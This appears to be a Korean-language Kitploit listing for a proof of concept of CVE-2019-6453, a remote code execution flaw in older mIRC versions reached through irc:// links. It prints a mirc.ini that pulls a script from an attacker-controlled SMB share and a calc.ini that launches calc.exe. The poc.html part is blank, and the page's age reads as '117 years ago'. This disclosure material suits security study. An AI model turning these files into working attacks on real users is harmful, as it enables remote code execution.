Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
mIRC-CVE-2019-6453 — CVE-2019-6453를 위한 계산 증명 | Kitploit
도구/GitHubGitHub/andripwn/mirc-cve-2019-6453
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubandripwn/mirc-cve-2019-6453

mIRC-CVE-2019-6453

CVE-2019-6453를 위한 계산 증명

저장소 보기
117년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2019-6453: mIRC <7.55에서 사용자 정의 URI 프로토콜 핸들러를 통한 인수 삽입으로 인한 RCE

[자세한 설명 보기]

우리는 irc:// URI 프로토콜 핸들러를 통해 mIRC에서 원격 코드 실행 취약점을 발견했습니다. mIRC는 인수 목록의 끝을 표시하기 위해 **--**와 같은 기호를 사용하지 않기 때문에, 공격자는 irc:// 링크를 통해 mIRC에 인수를 전달하고 공격자가 제어하는 Samba 파일 서버에서 사용자 정의 mirc.ini를 로드하여 임의 코드를 실행할 수 있습니다. **ircs://**도 동일하게 작동합니다.

PoC

계산기 증명에는 세 가지 파일이 필요합니다: mirc.ini, calc.ini 및 poc.html. 공격자 측에서 Samba 파일 서버가 실행 중이라고 가정합니다. 예제를 위해, 다음 코드는 호스트 127.0.0.1에서 실행 중이라고 가정합니다 (즉, 아래 파일에서 127.0.0.1을 자신의 서버 주소로 바꾸어 시도해보세요).

mirc.ini

mirc.ini는 파일 서버의 C:\mirc-poc\mirc.ini에 위치해야 하는 사용자 정의 구성 파일입니다.

root@kitploit:~
[rfiles]
n2=\\127.0.0.1\C$\mirc-poc\calc.ini

calc.ini

calc.ini는 파일 서버의 C:\mirc-poc\calc.ini에 위치해야 하는 원격 스크립트 파일입니다.

root@kitploit:~
[script]
n0=on *:START: {
n1=  /run calc.exe
n2=}

poc.html

poc.html을 방문하기만 하면 mIRC가 irc:// URI 스킴의 기본 핸들러로 설정되어 있고 브라우저가 페이로드를 인코딩하지 않는다면 작동합니다. 브라우저와 구성에 따라 프롬프트가 표시될 수도 있습니다 (Firefox의 경우는 아님).

root@kitploit:~

PoC gif

PoC gif

영향을 받는 버전

이 PoC는 mIRC <7.55에서 실행됩니다.

Edge 42.17134 (마지막 미리보기 버전) 및 Firefox 64.0.2 (마지막 릴리스)에서 PoC를 실행할 수 있습니다. Chrome에서는 URI 프로토콜을 처리하는 방식 때문에 작동하지 않습니다 (URI가 애플리케이션에 전달되기 전에 인코딩됩니다).

도구 다운로드